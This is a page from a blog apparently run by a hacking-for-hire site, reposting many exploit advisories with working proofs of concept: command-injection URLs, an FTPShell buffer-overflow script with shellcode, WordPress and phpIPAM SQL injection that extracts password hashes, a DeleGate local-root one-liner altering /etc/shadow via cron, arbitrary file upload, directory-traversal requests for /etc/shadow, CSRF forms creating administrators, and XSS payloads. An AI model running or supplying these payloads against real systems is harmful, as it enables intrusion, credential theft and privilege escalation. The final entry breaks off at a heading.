Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863280934

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
source: https://www.securityfocus.com/bid/66487/info

DotItYourself is prone to a remote command-execution vulnerability because the application fails to sufficiently sanitize user-supplied input data.

An attacker may leverage this issue to execute arbitrary commands in the context of the affected application.

DotItYourself 6.11.060830 is vulnerable; other versions may also be affected. 

http://www.example.com/cade/dot-it-yourself.cgi?download=;id|
HireHackking 
source: https://www.securityfocus.com/bid/66489/info

Beheer Systeem is prone to a remote command-execution vulnerability because the application fails to sufficiently sanitize user-supplied input data.

An attacker may leverage this issue to execute arbitrary commands in the context of the affected application.

Beheer Systeem 6.1 is vulnerable; other versions may also be affected. 

http://www.example.com/!/pbs.cgi?download=;id|
HireHackking 
'''
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:
http://hyp3rlinx.altervista.org/advisories/FTPSHELL-v5.24-BUFFER-OVERFLOW.txt


Vendor:
================================
www.ftpshell.com


Product:
================================
FTPShell Client version 5.24

FTPShell client is a windows file transfer program that enables users to
reliably transfer files,
upload to websites, and download updates from the internet.


Vulnerability Type:
===================
Buffer Overflow


CVE Reference:
==============
N/A


Vulnerability Details:
=====================
ftpshell.exe client has a buffer overflow entry point in the 'Address'
input field used to connect to an FTP server.
Allowing local arbitrary code execution by overwriting several registers on
the stack and controlling program execution flow.
EIP register will be used to jump to our malicious shellcode which will be
patiently waiting in ECX register.

exploited registers dump...

EAX 00000021
ECX 0012E5B0
EDX 76F670B4 ntdll.KiFastSystemCallRet
EBX 76244FC4 kernel32.76244FC4
ESP 0012E658 ASCII "calc.exe"   <--------- BAM!
EBP 7621E5FD kernel32.WinExec
ESI 001D2930
EDI 76244FEC kernel32.76244FEC
EIP 015FB945
C 0  ES 0023 32bit 0(FFFFFFFF)
P 1  CS 001B 32bit 0(FFFFFFFF)
A 0  SS 0023 32bit 0(FFFFFFFF)
Z 1  DS 0023 32bit 0(FFFFFFFF)
S 0  FS 003B 32bit 7FFDE000(FFF)
T 0  GS 0000 NULL
D 0
O 0  LastErr ERROR_SUCCESS (00000000)
EFL 00200246 (NO,NB,E,BE,NS,PE,GE,LE)
ST0 empty g
ST1 empty g
ST2 empty g
ST3 empty g
ST4 empty g
ST5 empty g
ST6 empty g
ST7 empty g
               3 2 1 0      E S P U O Z D I
FST C5E1  Cond 1 1 0 1  Err 1 1 1 0 0 0 0 1  (Unordered)
FCW 1372  Prec NEAR,64  Mask    1 1 0 0 1 0


test stack dump....

(3b8.fa0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** WARNING: Unable to verify checksum for ftpshell.exe
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for
ftpshell.exe -
eax=41414141 ebx=017ebc70 ecx=017ebc70 edx=0012ebc8 esi=0012ebc8
edi=017a9498
eip=41414141 esp=0012e928 ebp=0012ea70 iopl=0         nv up ei pl nz na po
nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000
efl=00210202
41414141 ??              ???


Exploit code(s):
===============
'''

import struct

#FTPShell Client version 5.24 - www.ftpshell.com
#Buffer Overflow Exploit
#by hyp3rlinx
#run to generate payload, then copy and inject
#into the 'Address' field on the client and BOOM!

#shellcode to pop calc.exe Windows 7 SP1
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")


#payload="A"*2475+"R"*4+"\xcc"*100  #<---- control EIP register

#find appropriate assembly instruction to call our payload JMP or CALL ECX.
#!mona jmp -r ecx -m kernel32.dll

eip=struct.pack('<L', 0x761C1FDC)    #jmp ecx kernel32.dll
payload="A"*2475+eip+sc              #<----- direct EIP overwrite no NOPs
no nothing... BOOOOOM!!!

file=open("C:\\ftpshell-exploit","w")
file.write(payload)
file.close()


'''
Disclosure Timeline:
========================================
Vendor Notification:  NR
December 29, 2015  : Public Disclosure



Exploitation Technique:
=======================
Local



Severity Level:
================
High



Description:
==========================================================


Request Method(s):              [+]  Local Injection


Vulnerable Product:             [+]  FTPShell Client version 5.24


Vulnerable Parameter(s):        [+] 'Address'



===========================================================

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.

by hyp3rlinx
'''
HireHackking 
/*
# Exploit Title: Simple Ads Manager 2.9.4.116 SQL Injection
# Date: 30-12-2015
# Software Link: https://wordpress.org/plugins/simple-ads-manager/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: webapps
 
1. Description

$whereClause and $whereClauseT and $whereClauseW and $whereClause2W are not escaped.

File: simple-ads-manager\ad.class.php

$aSql = "
	(SELECT
	  @pid := sp.id AS pid,
	  0 AS aid,
	  sp.name,
	  sp.patch_source AS code_mode,
	  @code_before := sp.code_before AS code_before,
	  @code_after := sp.code_after AS code_after,
	  @ad_size := IF(sp.place_size = \"custom\", CONCAT(CAST(sp.place_custom_width AS CHAR), \"x\", CAST(sp.place_custom_height AS CHAR)), sp.place_size) AS ad_size,
	  sp.patch_code AS ad_code,
	  sp.patch_img AS ad_img,
	  \"\" AS ad_alt,
	  0 AS ad_no,
	  sp.patch_link AS ad_target,
	  0 AS ad_swf,
	  \"\" AS ad_swf_flashvars,
	  \"\" AS ad_swf_params,
	  \"\" AS ad_swf_attributes,
	  \"\" AS ad_swf_fallback,
	  sp.patch_adserver AS ad_adserver,
	  sp.patch_dfp AS ad_dfp,
	  0 AS count_clicks,
	  0 AS code_type,
	  IF((sp.patch_source = 1 AND sp.patch_adserver) OR sp.patch_source = 2, -1, 1) AS ad_cycle,
	  @aca := IFNULL((SELECT AVG(sa.ad_weight_hits*10/(sa.ad_weight*$cycle)) FROM $aTable sa WHERE sa.pid = @pid AND sa.trash IS NOT TRUE AND {$whereClause} {$whereClauseT} {$whereClause2W}), 0) AS aca
	FROM {$pTable} sp
	WHERE {$pId} AND sp.trash IS FALSE)
	UNION
	(SELECT
	  sa.pid,
	  sa.id AS aid,
	  sa.name,
	  sa.code_mode,
	  @code_before AS code_before,
	  @code_after AS code_after,
	  @ad_size AS ad_size,
	  sa.ad_code,
	  sa.ad_img,
	  sa.ad_alt,
	  sa.ad_no,
	  sa.ad_target,
	  sa.ad_swf,
	  sa.ad_swf_flashvars,
	  sa.ad_swf_params,
	  sa.ad_swf_attributes,
	  sa.ad_swf_fallback,
	  0 AS ad_adserver,
	  0 AS ad_dfp,
	  sa.count_clicks,
	  sa.code_type,
	  IF(sa.ad_weight, (sa.ad_weight_hits*10/(sa.ad_weight*$cycle)), 0) AS ad_cycle,
	  @aca AS aca
	FROM {$aTable} sa
	WHERE sa.pid = @pid AND sa.trash IS FALSE AND {$whereClause} {$whereClauseT} {$whereClauseW})
	ORDER BY ad_cycle
	LIMIT 1;";

http://security.szurek.pl/simple-ads-manager-294116-sql-injection.html

2. Proof of Concept
*/

<?php
$out = array();
$out['WC'] = '1=0';
$out['WCT'] = '';
$out['WCW'] = ') UNION (SELECT user_pass, 1, 2, 3, 4, 5, 6, 7, 8, 9, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 0, 1, 2 FROM wp_users WHERE ID = 1';
$out['WC2W'] = '';
?>
<form method="post" action="http://wp-url/wp-content/plugins/simple-ads-manager/sam-ajax-loader.php">
<input type="hidden" name="action" value="load_place">
<input type="hidden" name="id" value="0">
<input type="hidden" name="pid" value="1">
<input type="text" name="wc" value="<?php echo base64_encode(serialize($out)); ?>">
<input type="submit" value="Send">
</form>

/*
Administrator password will be here:

{"success":true,"ad":"<div id='c2077_1_%here_is_password%' class='sam-container sam-place' data-sam='0'><\/div>","id":"1","pid":"%here_is_password%","cid":"c2077_1_%here_is_password%"}

3. Solution:
   
Update to version 2.9.5.118
*/
HireHackking 
Title: Local root vulnerability in DeleGate v9.9.13
Author: Larry W. Cashdollar, @_larry0
Date: 2015-12-17
Advisory: http://www.vapidlabs.com/advisory.php?v=159
Download Sites: http://delegate.hpcc.jp/delegate/ 
                              http://delegate.org/delegate/
Vendor: National Institute of Advanced Industrial Science and Technology
Vendor Notified: 2015-12-17
Vendor Contact: y.sato@delegate.org ysato@etl.go.jp
Description: DeleGate is a multipurpose proxy server which relays various application protocols on TCP/IP or UDP/IP, including HTTP, FTP, Telnet, NNTP, SMTP, POP, IMAP, LPR, LDAP, ICP, DNS, SSL, Socks, and more. DeleGate mediates communication between servers and clients where direct communication is impossible, inefficient, or inconvenient.

Vulnerability:
Installation of delegate 9.9.13 sets some binaries setuid root, at least one of these binaries can be used to escalate the privileges of a local user.  The binary dgcpnod creates a node allowing a local unprivileged user to create files anywhere on disk.   By creating a file in /etc/cron.hourly a local user can execute commands as root.

Installation of software via source or binary distribution with option to not run as root results in a script set-subin.sh to run setting the setuid bit on four binaries.  In Linux distributions where this software is part of the package list these binaries are not setuid root. (archlinux)

From documentation http://www.delegate.org/delegate/newbies-ja.shtml (translated to english):
Go is included in the binary distribution, or DGROOT that you can build from the source to the location of preference, and then change the name if necessary. This is the DgRoot. In addition, if needed, you can rename the executable file of DeleGate to the name of the preference. This is the DgExe.
"In Unix version subin in if you want to use "(such as when using a privileged port), do the following.

  (3-2uk) $ cd DgRoot / subin
          $ Sh setup-subin.sh

larry@f4ult:~/dg9_9_13/DGROOT/subin$ ls -l
total 1916
-r-sr-s--- 1 root  larry 384114 Oct 31  2014 dgbind
-r-sr-s--- 1 root  larry 384598 Oct 31  2014 dgchroot
-r-sr-s--- 1 root  larry 384161 Oct 31  2014 dgcpnod
-rwxr-xr-x 1 larry larry 384114 Oct 31  2014 dgdate
-rwxr-xr-x 1 larry larry  29066 Oct 31  2014 dgforkpty
-r-sr-s--- 1 root  larry 384113 Oct 31  2014 dgpam
-rwxr-x--- 1 larry larry    272 Oct 27  2014 setup-subin.sh

This script sets the setuid bit on four binaries:

larry@f4ult:~/dg9_9_13/DGROOT/subin$ cat setup-subin.sh
#!/bin/sh

SUBINS="dgpam dgbind dgchroot dgcpnod"
sudo sh -c "chown root $SUBINS; chmod 6550 $SUBINS"
if [ $? != 0 ]; then
  su root -c "chown root $SUBINS; chmod 6550 $SUBINS"
fi

CVEID: 2015-7556


Exploit Code:
$ touch /tmp/rootme; chmod +x /tmp/rootme; ./dgcpnod /tmp/rootme /etc/cron.hourly/rootme; echo -e '#!/bin/bash \n chmod 777 /etc/shadow' > /etc/cron.hourly/rootme
HireHackking 
source: https://www.securityfocus.com/bid/66490/info

The Felici theme for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.

An attacker can exploit this issue to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access to the application; other attacks are also possible.

Felici 1.7 is vulnerable; other versions may also be affected. 

<?php
$uploadfile="cafc.php.jpg";
$ch =
curl_init("http://127.0.0.1/wp-content/plugins/custom-background/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
         array('Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/plugins/custom-background/uploadify/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
HireHackking 
source: https://www.securityfocus.com/bid/66536/info

Symphony is prone to a cross-site request-forgery vulnerability.

An attacker can exploit the cross-site request forgery issue to perform unauthorized actions in the context of a logged-in user of the affected application. This may aid in other attacks.

Symphony version 2.3.1 and prior are vulnerable. 

<img src="http://www.example.com/symphony/system/authors/?order=asc&sort=id%20INTO%20OUTFILE%20%27/var/www/file.txt%27%20--%20">
HireHackking 
source: https://www.securityfocus.com/bid/66593/info

ICOMM 610 is prone to a cross-site request-forgery vulnerability.

Exploiting this issue may allow a remote attacker to perform certain unauthorized actions. This may lead to further attacks.

ICOMM 610 01.01.08.991 and prior are vulnerable. 

<html>
  <!-- CSRF PoC --->
  <body>
    <form action="http://www.example.com/cgi-bin/sysconf.cgi?page=personalize_password.asp&sid=rjPd8QVqvRGX×tamp=1396366701157" method="POST">
      <input type="hidden" name="PasswdEnable" value="on" />
      <input type="hidden" name="New_Passwd" value="test" />
      <input type="hidden" name="Confirm_New_Passwd" value="test" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
HireHackking 
source: https://www.securityfocus.com/bid/66677/info

PHPFox is prone to a security-bypass vulnerability that may allow attackers to perform actions without proper authorization.

Attackers can leverage this issue to bypass security restrictions and perform unauthorized actions; this may aid in launching further attacks.

PHPFox 3.7.3, 3.7.4 and 3.7.5 are vulnerable 

&core[ajax]=true&core[call]=comment.add&core[security_token]=686f82ec43f7dcd92784ab36ab5cbfb7
&val[type]=user_status&val[item_id]=27&val[parent_id]=0&val[is_via_feed]=0 val[default_feed_value]=Write%20a%20comment...&val[text]=AQUI!!!!!!!!!!!& core[is_admincp]=0&core[is_user_profile]=1&core[profile_user_id]=290
HireHackking 
source: https://www.securityfocus.com/bid/66549/info

Primo Interactive CMS is prone to a remote command-execution vulnerability because the application fails to sufficiently sanitize user-supplied input data.

An attacker may leverage this issue to execute arbitrary commands in the context of the affected application.

Primo Interactive CMS 6.2 is vulnerable; other versions may also be affected. 

http://www.example.com/cgi-bin/pcm.cgi?download=;id|
HireHackking 
source: https://www.securityfocus.com/bid/66708/info

Inneradmission component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/index.php?option=com_inneradmission&id=1'a
HireHackking 
source: https://www.securityfocus.com/bid/66769/info

eazyCMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/index.php?tab=[SQLI]
HireHackking 
source: https://www.securityfocus.com/bid/66817/info

Xangati XSR And XNR are prone to a multiple directory-traversal vulnerabilities.

A remote attacker could exploit these vulnerabilities using directory-traversal characters ('../') to access or read arbitrary files that contain sensitive information.

Xangati XSR prior to 11 and XNR prior to 7 are vulnerable. 

curl -i -s -k  -X 'POST' \
-H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Java/1.7.0_25' \
--data-binary $'key=foo&request=getUpgradeStatus&file=%2Ffloodguard%2Freports%2F../../../../../etc/shadow' \
'hxxps://www.example.com/servlet/MGConfigData'

POST /servlet/MGConfigData HTTP/1.1
key=validkey&request=download&download=%2Ffloodguard%2Fdata%2F../../../../../../etc/shadow&updLaterThan=0&head=0&start=0&limit=4950&remote=www.example.com

POST /servlet/MGConfigData HTTP/1.1
key=validkey&request=port_svc&download=%2Ffloodguard%2Fdata%2F../../../../../../../etc/shadow&updLaterThan=0&remote=www.example.com

curl -i -s -k  -X 'POST' \
-H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Java/1.7.0_25' \
--data-binary $'key=validkey&binfile=%2Fourlogs%2F../../../../../../../../../etc/shadow' \
'hxxps://www.example.com/servlet/MGConfigData'
HireHackking 
source: https://www.securityfocus.com/bid/66817/info
 
Xangati XSR And XNR are prone to a multiple directory-traversal vulnerabilities.
 
A remote attacker could exploit these vulnerabilities using directory-traversal characters ('../') to access or read arbitrary files that contain sensitive information.
 
Xangati XSR prior to 11 and XNR prior to 7 are vulnerable. 

curl -i -s -k  -X 'POST' \
-H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Java/1.7.0_25' \
--data-binary $'key=validkey&falconConfig=getfile&file=%2Ffloodguard%2F../../../../../../../../../etc/shadow' \
'hxxps://www.example.com/servlet/Installer'
HireHackking 
<!doctype html>
<html>
	<head>
		<meta http-equiv='Cache-Control' content='no-cache'/>
		<title>EdUtil::GetCommonAncestorElement Remote Crash</title>
		<script>
      /*
      * Title : IE11 EdUtil::GetCommonAncestorElement Remote Crash
      * Date : 31.12.2015
      * Author : Marcin Ressel (https://twitter.com/m_ressel)
      * Vendor Hompage : www.microsoft.com
      * Software Link : n/a
      * Version : 11.0.9600.18124
      * Tested on: Windows 7 x64
      */
         		
      var trg,src,arg;
      var range,select,observer;
			function testcase()
			{
			  document.body.innerHTML ='<table><colgroup></colgroup><table><tbody><table><table></table><col></col></table></tbody></table></table><select><option>0]. option</option><option>1]. option</option></select><ul type="circle"><li>0]. li</li><li>1]. li</li><li>2]. li</li><li>3]. li</li></ul><select><option>0]. option</option><option>1]. option</option><option>2]. option</option><option>3]. option</option><option>4]. option</option><option>5]. option</option><option>6]. option</option><option>7]. option</option></select>';
		    var all = document.getElementsByTagName("*"); 
			  trg = all[9];
			  src = all[2]; 
				arg = all[12];
	      select = document.getSelection(); 
			  observer = new MutationObserver(new Function("","range = select.getRangeAt(258);")); 
				select.selectAllChildren(document);
			  document.execCommand("selectAll",false,'<ul type="square"><li>0]. li</li><li>1]. li</li><li>2]. li</li><li>3]. li</li><li>4]. li</li><li>5]. li</li><li>6]. li</li></ul><select><option>0]. option</option><option>1]. option</option><option>2]. option</option><option>3]. option</option><option>4]. option</option><option>5]. option</option><option>6]. option</option><option>7]. option</option></select>');	
			}
		</script>
	</head>
	<body onload='testcase();'>	
	</body>
</html>
HireHackking 
source: https://www.securityfocus.com/bid/66819/info

Xangati XSR And XNR are prone to a remote command-execution vulnerability because the application fails to sufficiently sanitize user-supplied input data.

An attacker may leverage this issue to execute arbitrary commands in the context of the affected application.

Xangati XSR prior to 11 and XNR prior to 7 are vulnerable.

curl -i -s -k  -X 'POST' \
-H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Java/1.7.0_25' \
--data-binary $'key=validkey&falconConfig=validateTest&path=%2Fvar%2Ftmp%2F&params=gui_input_test.pl&params=-p+localhost;CMD%3d$\'cat\\x20/etc/shadow\';$CMD;+YES' \
'hxxps://www.example.com/servlet/Installer'
HireHackking 
source: https://www.securityfocus.com/bid/66923/info

Jigowatt PHP Event Calendar is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Jigowatt PHP Event Calendar 2.16b is vulnerable; other versions may also be affected. 

http://www.example.com/code/calendar/day_view.php?day=23&month=4&year=[SQL injection]
HireHackking 
// source: https://www.securityfocus.com/bid/67023/info

Apple Mac OS X is prone to a local security-bypass vulnerability.

Attackers can exploit this issue to bypass certain security restrictions and perform unauthorized actions.

Apple Mac OS X 10.9.2 is vulnerable; other versions may also be affected. 

#include <stdio.h>
#include <strings.h>
#include <sys/shm.h>

int main(int argc, char *argv[])
{
  int shm = shmget( IPC_PRIVATE, 0x1337, SHM_R | SHM_W );

  if (shm < 0)
    {
      printf("shmget: failed");
      return 6;
    }

  struct shmid_ds lolz;

  int res = shmctl( shm, IPC_STAT, &lolz );
  if (res < 0)
    {
      printf("shmctl: failed");
      return 1;
    }

  printf( "%p\n", lolz.shm_internal );

}
HireHackking 
[Systems Affected]
    Product              :    Confluence
    Company            :    Atlassian
    Versions (1)        :    5.2 / 5.8.14 / 5.8.15
    CVSS Score (1)  :    6.1 / Medium (classified by vendor)
    Versions (2)        :    5.9.1 / 5.8.14 / 5.8.15
    CVSS Score (2)  :    7.7 / High (classified by vendor)


[Product Description]
    Confluence is team collaboration software, where you create,
organize and discuss work with your team. it is developed and marketed
by Atlassian.


[Vulnerabilities]
    Two vulnerabilities were identified within this application:
    (1) Reflected Cross-Site Scripting (CVE-2015-8398)
    (2) Insecure Direct Object Reference (CVE-2015-8399)


[Advisory Timeline]
    26/Oct/2015 - Discovery and vendor notification
    26/Oct/2015 - Vendor replied for Cross-Site Scripting (SEC-490)
    26/Oct/2015 - Issue CONF-39689 created
    27/Oct/2015 - Vendor replied for Insecure Direct Object Reference
(SEC-491 / SEC-492)
    27/Oct/2015 - Issue CONF-39704 created
    16/Nov/2015 - Vendor confirmed that Cross-Site Scripting was fixed
    19/Nov/2015 - Vendor confirmed that Insecure Direct Object
Reference was fixed


[Patch Available]
    According to the vendor, upgrade to Confluence version 5.8.17


[Description of Vulnerabilities]
    (1) Reflected Cross-Site Scripting
        An unauthenticated reflected Cross-site scripting was found in
the REST API. The vulnerability is located at
/rest/prototype/1/session/check/ and the payload used is <img src=a
onerror=alert(document.cookie)>

        [References]
            CVE-2015-8398 / SEC-490 / CONF-39689

        [PoC]
            http://<Confluence
Server>/rest/prototype/1/session/check/something%3Cimg%20src%3da%20onerror%3dalert%28document.cookie%29%3E


    (2) Insecure Direct Object Reference
        Two instances of Insecure Direct Object Reference were found
within the application, that allows any authenticated user to read
configuration files from the application

        [References]
            CVE-2015-8399 / SEC-491 / SEC-492 / CONF-39704

        [PoC]
            http://<Confluence
Server>/spaces/viewdefaultdecorator.action?decoratorName=<FILE>
            http://<Confluence
Server>/admin/viewdefaultdecorator.action?decoratorName=<FILE>

            This is an example of accepted <FILE> parameters
            /WEB-INF/decorators.xml
            /WEB-INF/glue-config.xml
            /WEB-INF/server-config.wsdd
            /WEB-INF/sitemesh.xml
            /WEB-INF/urlrewrite.xml
            /WEB-INF/web.xml
            /databaseSubsystemContext.xml
            /securityContext.xml
            /services/statusServiceContext.xml
            com/atlassian/confluence/security/SpacePermission.hbm.xml
            com/atlassian/confluence/user/OSUUser.hbm.xml
            com/atlassian/confluence/security/ContentPermissionSet.hbm.xml
            com/atlassian/confluence/user/ConfluenceUser.hbm.xml

-- 
S3ba
@s3bap3
linkedin.com/in/s3bap3
HireHackking 
source: https://www.securityfocus.com/bid/67031/info

iDevAffiliate is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

iDevAffiliate 5.0 and prior are vulnerable. 

http://www.example.com/idevaffiliate/idevads.php?id=6&ad=[SQLi]
HireHackking 
#Exploit Title      : Open Audit SQL Injection Vulnerability
#Exploit Author  : Rahul Pratap Singh
#Date                 : 2/Jan/2016
#Home page Link  : https://github.com/jonabbey/open-audit
#Website      : 0x62626262.wordpress.com
#Twitter              : @0x62626262
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94

1. Description

"id" field in software_add_license.php is not properly sanitized, that
leads to SQL Injection Vulnerability.

"pc" field in delete_system.php, list_viewdef_software_for_system.php and
system_export.php is not properly sanitized, that leads to SQL Injection
Vulnerability.


2. Vulnerable Code:

software_add_license.php: ( line 12 to 13)

$sql = "SELECT * from software_register WHERE software_reg_id = '" .
$_GET["id"] . "'";
$result = mysql_query($sql, $db);


delete_system.php: ( line 5 to 10)

  if (isset($_GET['pc'])) {

    $link = mysql_connect($mysql_server, $mysql_user, $mysql_password) or
die("Could not connect");
    mysql_select_db("$mysql_database") or die("Could not select database");
    $query = "select system_name from system where system_uuid='" .
$_GET['pc'] . "'";
    $result = mysql_query($query)  or die("Query failed at retrieve system
name stage.");


list_viewdef_software_for_system.php: ( line 2 to 3)

$sql = "SELECT system_os_type FROM system WHERE system_uuid = '" .
$_REQUEST["pc"] . "'";
$result = mysql_query($sql, $db);


system_export.php: ( line 108 to 112)

if(isset($_REQUEST["pc"]) AND $_REQUEST["pc"]!=""){
  $pc=$_REQUEST["pc"];
  $_GET["pc"]=$_REQUEST["pc"];
  $sql = "SELECT system_uuid, system_timestamp, system_name FROM system
WHERE system_uuid = '$pc' OR system_name = '$pc' ";
  $result = mysql_query($sql, $db);
HireHackking 
######################################################################
# Exploit Title: PHPIPAM v1.1.010 Multiple Vulnerabilities
# Date: 04/01/2016
# Author: Mickael Dorigny @ Synetis
# Vendor or Software Link: http://phpipam.net/
# Version: 1.1.010
# Category: Multiple Vulnerabilities
# Tested on : 1.1.010
######################################################################

PHPIPAM description :
======================================================================
PHPIPAM is an open-source web IP address management application. Its goal is to provide light, modern and useful IP address management. It is php-based application with MySQL database backend, using jQuery libraries, ajax and some HTML5/CSS3 features.

Vulnerabilities description :
======================================================================
PHPIPAM version 1.1.010 is vulnerable to multiple vulnerabilities like :
- Stored XSS without authentication
- Reflected XSS
- SQL Injection
- CSRF

Proof of Concept n°1 -  Stored XSS without authentication :
================================================================================================
Through PHPIPAM, external users can try to authenticate on the following page :

http://server/phpipam/?page=login

For each try, even if it's a success or a failure, a line is added in the log register. The admin user can read those logs through the back office. Here is an example of authentication log lines :
"User Admin1 logged in."
"User User1 failed to log in."

Here we can see that the username is directly written in logs.

A malicious user can use this log feature to make administrator executes JavaScript instructions in his browser. To do so, an external user can try to inject JavaScript instructions in the "username" field of the authentication form.

PoC :

[REQUEST]
http://server/phpipam/site/login/loginCheck.php
[POSTDATA]
ipamusername=<script>alert("RXSS01")</script>&ipampassword=XXX

With this request, the following line will automatically be added in the "Log Files" section in the admin back office :

<tr class="danger Warning" id="9">
  <td class="date">2015-12-03 22:28:22</td>
  <td class="severity"><span>2</span>Warning</td>
  <td class="username"></td>
  <td class="ipaddr">192.168.1.47</td>
  <td class="command"><a href="" class="openLogDetail" data-logid="9">User <script>alert("RXSS01");</script> failed to log in.</a></td>
  <td class="detailed">  </td>
</tr>

JavaScript instructions will be executed by admin's browser each time he will consult the Log File section. Additionnally, latest log lines are displayed in the home page of each admin, so JavaScript instructions will be executed at this moment two.

Through this vulnerability, an attacker could tamper with page rendering, redirect victim to fake login page, or capture users credentials such cookies, and especially admin's ones. Moreover, an user without privileges can use this vulnerability to steal Administrator cookie to lead privileges escalation in PHPIPAM.

Proof of Concept n°2 - SQL Injection : 
================================================================================================
Once an user or an admin is authenticated, he can makes search through the search bar. This feature can be used to modify SQL query passed by the web application to the database. 

PoC : 
1" UNION SELECT 1,2,3,4,user(),6,7,8,9,10,11,12,13,14,15#

Note that the search bar in the top right of the web application seems to be protected against this injection. But the "Search IP database" form that is displayed after a first search isn't well protected. Server answer is displayed in table, for the example injection, this is the replied lines : 
: 

<tr class="subnetSearch" subnetid="1" sectionname="" sectionid="" link="|1">
  <td></td>
  <td><a href="?page=subnets&section=4&subnetId=1">0.0.0.2/3</a></td>
#   <td><a href="?page=subnets&section=4&subnetId=1">root@localhost</a></td>
   <td>0.0.0.0/</td>
   <td></td>
   <td>disabled</td>
  <td><button class="btn btn-xs btn-default edit_subnet" data-action="edit" data-subnetid="1" data-sectionid="4" href="#" rel="tooltip" data-container="body" title="Edit subnet details"></button></td>
</tr>

Here, line marked with a "#" correspond to text data in the SQL database so they can display any requested data. Through this vulnerability, an attacker can dump and modify database content.

Proof of Concept n°3 - Reflected Cross-Site Scripting (RXSS) with authentication :
================================================================================================
A search form is displayed on every page on the top of each page. When this form is used, users are redirected to a search result page that display another form. Both of these forms are vulnerable to XSS through the following PoC. Several evasion tricks can be used to bypass the initial protection that delete HTML tags.

Note that the initial form on the top of each page is protected from basic XSS by deleting HTML tags.

PoC for the top search form: 
[REQUEST]
ABC" onmouseover=alert(1) name="A

This payload will executes javascript instructions when the user will pass his cursor over the new search form that is displayed on the middle of the search result page

PoC for the search form displayed in search result page :

[REQUEST]
ABC' onmouseover=alert(1) name='A

This payload will executes javascript instruction when the user will pass his cursor over initial search form on top of the page.

Through this vulnerability, an attacker could tamper with page rendering, redirect victim to fake login page, or capture users credentials such cookies, and especially admin's ones. Moreover, an user without privileges can use this vulnerability to steal Administrator cookie to lead privileges escalation in PHPIPAM.

Proof of Concept n°4 - CSRF on user creation :
================================================================================================
The user creation form isn't protected against CSRF attack. Consequently, an administrator can be trapped to create an user with administrator permissions by clicking on a malicious link which will make him execute the following request :

PoC : 
[REQUEST]
http://server/phpipam/site/admin/usersEditResult.php 
[POSTDATA]
real_name=user2&username=user2&email=user2%40user1.fr&role=Administrator&userId=&action=add&domainUser=0&password1=password123&password2=password123&lang=3&notifyUser=on&mailNotify=No&mailChangelog=No&group3=on&group2=on

Here, the user named "user2" will be created with "Administrator" permissions. Here is the used form to generate a request :

<form method=post action=http://server/phpipam/site/admin/usersEditResult.php>
        <input type=hidden name=real_name value=user123>
        <input type=hidden name=username value=user123>
        <input type=hidden name=email value="user123@okok.fr">
        <input type=hidden name=role value=Administrator><!-- Here, we give Administrator permission -->
        <input type=hidden name=action value=add><!-- Here, we add a user-->
        <input type=hidden name=domainUser value=user123>
        <input type=hidden name=password1 value=password123><!-- > 8 characters-->
        <input type=hidden name=password2 value=password123><!-- > 8 characters-->
        <input type=hidden name=lang value=3>
        <input type=hidden name=notifyUser value=off>
        <input type=hidden name=mailNotify value=No>
        <input type=hidden name=mailChangelog value=no>
        <input type=submit value="Click here, it's awesome !">
</form>

Proof of Concept n°5 : CSRF on user attributes modification
================================================================================================
